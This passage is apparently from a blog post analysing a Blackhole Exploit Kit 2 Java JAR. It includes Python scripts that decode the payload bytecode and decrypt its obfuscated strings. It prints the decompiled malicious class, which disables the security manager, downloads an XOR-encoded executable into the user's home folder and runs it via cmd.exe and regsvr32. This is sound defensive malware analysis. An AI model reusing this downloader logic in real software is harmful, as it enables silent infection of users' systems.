60700C70107002CFF000800010100040700C80700C90107002CFF000900010100040700CA0700CB0107002CFF000A00010100040700CC0700CD0107002CFF000A00010100040700CE0700CF0107002CFF000A00010100040700D00700D10107002CFF000A00010100040700D20700D30107002CFF000A00010100040700D40700D50107002CFF0006000000050700D60700D70107002C01FF000E00010100060700D80700D90101010700DAFF000100010100080700DC0700DD0101010700DE0700DF01FF002300010100090700E00700E10101010700E20700E30101FF000400010100090700E40700E50101010700E60700E70101FF000400010100090700E80700E90101010700EA0700EB0101FF000400010100090700EC0700ED0101010700EE0700EF0101FF000400010100090700F0"
asd_str125 = "0700F10101010700F20700F30101FF0001000101000A0700F40700F50101010700F60700F7010101FF000F00010100060700F80700F90101010700FAFB004D0001004900000002004A"


codehex_aa = "(?i).j";
asd_zxc = "xe"
asd_zxc2 = ".e"

#hw_str12 = aaz().replace("?jar", ".exe") + "?"

def main():
  abyte0 = decodeH(one())
  print abyte0

if __name__ == "__main__":
    main()


Run the script and it will print Java Bytecode for the class the Bad Guys want to run on your system(Thrugh the exploitation of the MBeanInstantiator bug they can now call restricted classes)
redirect the output to a .class file. e.g.

$python decode_blachole.py > bhclass.class


Ok so where are we at? Well at this time we are probably hungry, so open a tin of SPAM, enjoy and move on.

5. Back to Java disassembly again

The bytecode needs to be disassembled so back to jad or showmycode.com. And we get the output:

import java.io.*;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.security.PrivilegedExceptionAction;
import java.util.Random;

public class javaRun
    implements PrivilegedExceptionAction
{

    public javaRun(String s)
    {
        a = s;
        try
        {
            Class.forName(z[0]).getMethod(z[2], new Class[] {
                Class.forName(z[1])
            }).invoke(Class.forName(z[0]), new Object[] {
                this
            });
        }
        catch(Exception exception) { }
    }

    public Object run()
        throws Exception
    {
        boolean flag = c;
        int i;
        String s;
        String s1;
        InputStream inputstream;
        int j;
        String s3;
        System.setSecurityManager(null);
        Random random = new Random();
        i = 0xf4240 + random.nextInt(0x7a1200);
        s = (new StringBuilder()).append(i).append(z[6]).toString();
        s1 = (new StringBuilder()).append(System.getProperty(z[4])).append("/").toString();
        String s2 = (new StringBuilder()).append(a.toString()).append(i).toString();
        URL url = new URL(s2);
        URLConnection urlconnection = url.openConnection();
        inputstream = urlconnection.getInputStream();
        j = 0;
        s3 = urlconnection.getHeaderField(z[10]);
        s3;
        if(flag) goto _L2; else goto _L1
_L1:
        if(s3 == null)
            break MISSING_BLOCK_LABEL_241;
          goto _L3
        throw ;
_L3:
        s3;
_L2:
        z[9];
        indexOf();
        if(flag)
            break MISSING_BLOCK_LABEL_216;
        -1;
        JVM INSTR icmpne 211;
           goto _L4 _L5
_L4:
        break MISSING_BLOCK_LABEL_184;
_L5:
        break MISSING_BLOCK_LABEL_211;
        throw ;
        s3;
        z[3];
        indexOf();
        if(flag)
            break MISSING_BLOCK_LABEL_216;
        break MISSING_BLOCK_LABEL_203;
        throw ;
        -1;
        JVM INSTR icmpeq 241;
           goto _L6 _L7
_L6:
        break MISSING_BLOCK_LABEL_211;
_L7:
        break MISSING_BLOCK_LABEL_241;
        throw ;
        throw ;
        j = 1;
        s = (new StringBuilder()).append(i).append(z[3]).toString();
        FileOutputStream fileoutputstream;
        byte abyte0[];
        int l;
        fileoutputstream = new FileOutputStream((new StringBuilder()).append(s1).append(s).toString());
        abyte0 = new byte[1024];
        l = i;
_L11:
        int k;
        int i1;
        if((k = inputstream.read(abyte0, 0, abyte0.length)) == -1)
            break; /* Loop/switch isn't completed */
        if(flag)
            break MISSING_BLOCK_LABEL_385;
        i1 = 0;
_L9:
        if(i1 >= k)
            break; /* Loop/switch isn't completed */
        l = l + 170 & 0xff;
        l ^= 0x48;
        abyte0[i1] ^= (byte)l;
        i1++;
        if(flag)
            continue; /* Loop/switch isn't completed */
        if(!flag) goto _L9; else goto _L8
        throw ;
_L8:
        fileoutputstream.write(abyte0, 0, k);
        if(!flag) goto _L11; else goto _L10
_L10:
        inputstream.close();
        fileoutputstream.close();
        Runtime runtime = Runtime.getRuntime();
        if(flag)
            break MISSING_BLOCK_LABEL_475;
        j;
        JVM INSTR ifeq 480;
           goto _L12 _L13
_L12:
        break MISSING_BLOCK_LABEL_404;
_L13:
        break MISSING_BLOCK_LABEL_480;
        throw ;
        runtime.exec(new String[] {
            z[7], z[5], z[11], z[8], (new StringBuilder()).append(s1).append(s).toString()
        });
        break MISSING_BLOCK_LABEL_475;
        throw ;
        if(!flag)
            break MISSING_BLOCK_LABEL_533;
        runtime.exec(new String[] {
            z[7], z[5], (new StringBuilder()).append(s1).append(s).toString()
        });
        break MISSING_BLOCK_LABEL_533;
        throw ;
        System.exit(0);
        break MISSING_BLOCK_LABEL_545;
        Exception exception;
        exception;
        System.exit(0);
        return null;
    }

    String a;
    public static boolean b;
    public static boolean c;
    private static final String z[];

    static 
    {
        String as[] = new String[12];
        as;
        as;
        0;
        "-oc\022{4kv\006'.zl]\024$mp\000&\004a{\007'(by\026'";
        -1;
          goto _L1
_L7:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        true;
        "-oc\022{4kv\006'.zl]\0055gc\0329\"ip\027\020?mp\003!.a{263gz\035";
        false;
          goto _L1
_L8:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        2;
        "#aE\001<1gy\0262\"j";
        true;
          goto _L1
_L9:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        3;
        "ijy\037";
        2;
          goto _L1
_L10:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        4;
        "2}p\001{/ax\026";
        3;
          goto _L1
_L11:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        5;
        "hM";
        4;
          goto _L1
_L12:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        6;
        "ikm\026";
        5;
          goto _L1
_L13:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        7;
        "$cq]0?k";
        6;
          goto _L1
_L14:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        8;
        "j}";
        7;
          goto _L1
_L15:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        9;
        "izx\003";
        8;
          goto _L1
_L16:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        10;
        "\004a{\0070)z87<4~z\000<3gz\035";
        9;
          goto _L1
_L17:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        11;
        "5kr\000#5='";
        10;
          goto _L1
_L18:
        JVM INSTR aastore ;
        z;
_L1:
        JVM INSTR swap ;
        toCharArray();
        JVM INSTR dup ;
        JVM INSTR arraylength .length;
        JVM INSTR swap ;
        int i = 0;
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        1;
        JVM INSTR icmpgt 222;
           goto _L2 _L3
_L2:
        JVM INSTR dup ;
        i;
_L5:
        JVM INSTR dup2 ;
        JVM INSTR caload ;
        byte byte0;
        switch(i % 5)
        {
        case 0: // '\0'
            byte0 = 0x47;
            break;

        case 1: // '\001'
            byte0 = 14;
            break;

        case 2: // '\002'
            byte0 = 21;
            break;

        case 3: // '\003'
            byte0 = 115;
            break;

        default:
            byte0 = 85;
            break;
        }
        byte0;
        JVM INSTR ixor ;
        (char);
        JVM INSTR castore ;
        i++;
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        JVM INSTR ifne 222;
           goto _L4 _L3
_L4:
        JVM INSTR dup2 ;
        JVM INSTR swap ;
          goto _L5
_L3:
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        i;
        JVM INSTR icmpgt 146;
           goto _L6 _L2
_L6:
        JVM INSTR new #44  <Class String>;
        JVM INSTR dup_x1 ;
        JVM INSTR swap ;
        String();
        intern();
        JVM INSTR swap ;
        JVM INSTR pop ;
        JVM INSTR swap ;
        JVM INSTR tableswitch 0 10: default 14
    //                   0 23
    //                   1 32
    //                   2 41
    //                   3 50
    //                   4 59
    //                   5 69
    //                   6 80
    //                   7 91
    //                   8 102
    //                   9 113
    //                   10 124;
           goto _L7 _L8 _L9 _L10 _L11 _L12 _L13 _L14 _L15 _L16 _L17 _L18
    }
}

Crap!!! what is this all about. This should be a happy ending where we had a nice and shiny class file disassembled but instead this code really got me wondering. I'm no Java Ken Guru, but this one beat me up. Luckily there is a lot of people knowing more than me about this and I found a great post about what this was here @ Security Obscurity Blog and even more @ The PlayGround.dk,

6. Introducing the Zelix Klassmaster 

 - Or what I would call it: "The Spanish Inquisition" youtube


So more work to do: I justed followed Mr. Larsens guide and came up with, well a Python script to decrypt The Spanish Inquisition, eh, Zelix Klassmaster encrypted strings:
#malforsec decrypt Spannish Inquisition encrypted strings 0.9.1
def decode(str1):
  decrstr = ""
  key = [71, 14, 21, 115, 85]
  for i in range(0, len(str1), 1):
    decrstr += chr((ord(str1[i])) ^ (key[i % 5]))
  return decrstr

encstr = ["-oc\022{4kv\006'.zl]\024$mp\000&\004a{\007'(by\026'",
          "-oc\022{4kv\006'.zl]\0055gc\0329\"ip\027\020?mp\003!.a{263gz\035",
          "#aE\001<1gy\0262\"j",
          "ijy\037",
          "2}p\001{/ax\026",
          "hM",
          "ikm\026",
          "$cq]0?k",
          "j}",
          "izx\003",
          "\004a{\0070)z87<4~z\000<3gz\035",
          "5kr\000#5='"]

def main():
  for i in range(0, len(encstr), 1):
    print decode(encstr[i])

if __name__ == "__main__":
    main()

So lets run the script and voila:

java.security.AccessController
java.security.PrivilegedExceptionAction
doPrivileged
.dll
user.home
/C
.exe
cmd.exe
-s
.tmp
Content-Disposition
regsvr32

7. Back to the Applet code hw.class:

Line 47:

String str12 = d.get(this);
str12 = (new StringBuilder(String.valueOf(Asd.aaz().replaceAll((new StringBuilder(String.valueOf(codehex.aa))).append("ar").toString(), (new StringBuilder(String.valueOf(Asd.zxc2))).append(Asd.zxc).toString())))).append("?").toString();
        }
        return str12;
    }
codehex strings:
public static String aa = "(?i).j";
Asd strings:
public static String zxc = "xe";
public static String zxc2 = ".e";
Asd.aaz():
public static String aaz()
        throws Exception
    {
        Class cc = hw;
        String classFilename = "hw.class";
        String urlToJar = cc.getResource(classFilename).toString();
        Method m = java/lang/String.getMethod("replaceAll", new Class[] {
            java/lang/String, java/lang/String
        });
        urlToJar = (String)m.invoke(urlToJar, new Object[] {
            "jar:", ""
        });
        urlToJar = urlToJar.replaceAll("!/hw.class", "");
        return urlToJar;
    }


This method, to me, looks like it is finding the URL or place that the hw.class/ jar was loaded. Replaceing hw.class with nothing nad jar with exe. In short we get the URL to the exe file, which is fed into the class we discussed above.

With the deobfuscation of the class files and decrypted strings we can see what the final class does:

import java.io.*;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.security.PrivilegedExceptionAction;
import java.util.Random;

public class javaRun
    implements PrivilegedExceptionAction
{

    public javaRun(String s)
    {
        a = s;
        try
        {
            Class.forName(java.security.AccessController).getMethod(doPrivileged, new Class[] {
                Class.forName(java.security.PrivilegedExceptionAction)
            }).invoke(Class.forName(java.security.AccessController), new Object[] {
                this
            });
        }
        catch(Exception exception) { }
    }

    public Object run()
        throws Exception
    {
        boolean flag = c;
        int i;
        String s;
        String s1;
        InputStream inputstream;
        int j;
        String s3;
        System.setSecurityManager(null);
        Random random = new Random();
        i = 0xf4240 + random.nextInt(0x7a1200);
        s = (new StringBuilder()).append(i).append(".exe").toString();
        s1 = (new StringBuilder()).append(System.getProperty("user.home")).append("/").toString();
        String s2 = (new StringBuilder()).append(a.toString()).append(i).toString();
        URL url = new URL(s2);
        URLConnection urlconnection = url.openConnection();
        inputstream = urlconnection.getInputStream();
        j = 0;
        s3 = urlconnection.getHeaderField("Content-Disposition");
                s = (new StringBuilder()).append(i).append(".dll").toString();
        fileoutputstream = new FileOutputStream((new StringBuilder()).append(s1).append(s).toString());
        abyte0 = new byte[1024];
        l = i;
        int k;
        int i1;
        if((k = inputstream.read(abyte0, 0, abyte0.length)) == -1)   
        i1 = 0;
        l = l + 170 & 0xff;
        l ^= 0x48;
        abyte0[i1] ^= (byte)l;
        i1++;
        fileoutputstream.write(abyte0, 0, k);
        inputstream.close();
        fileoutputstream.close();
        Runtime runtime = Runtime.getRuntime();
        runtime.exec(new String[] {
            "cmd.exe", "/C", "regsvr32", "-s", (new StringBuilder()).append(s1).append(s).toString()
        });
        runtime.exec(new String[] {
            "cmd.exe", "/C", (new StringBuilder()).append(s1).append(s).toString()
        });
        return null;
    }

8. The End

My conclusion is that the exe is loaded from the same URL base as the JAR archive was loaded from. Its written to disk under user.home. It registrers a service silently(cmd.exe /C regsrv32 -S) and executes the exe file(cmd.exe /C )

I'm not sure if the XOR of the one byte of abyte0 is used in the code. Hopefully I can confirm that the next time I download a BHEK2 JAR archive. 


Feedback are welcome! So please enlighten me on any misinterpretation. You are of course welcome to use any Python code should it interset you.



Happy BHEK2 JAR archives deobfuscation :)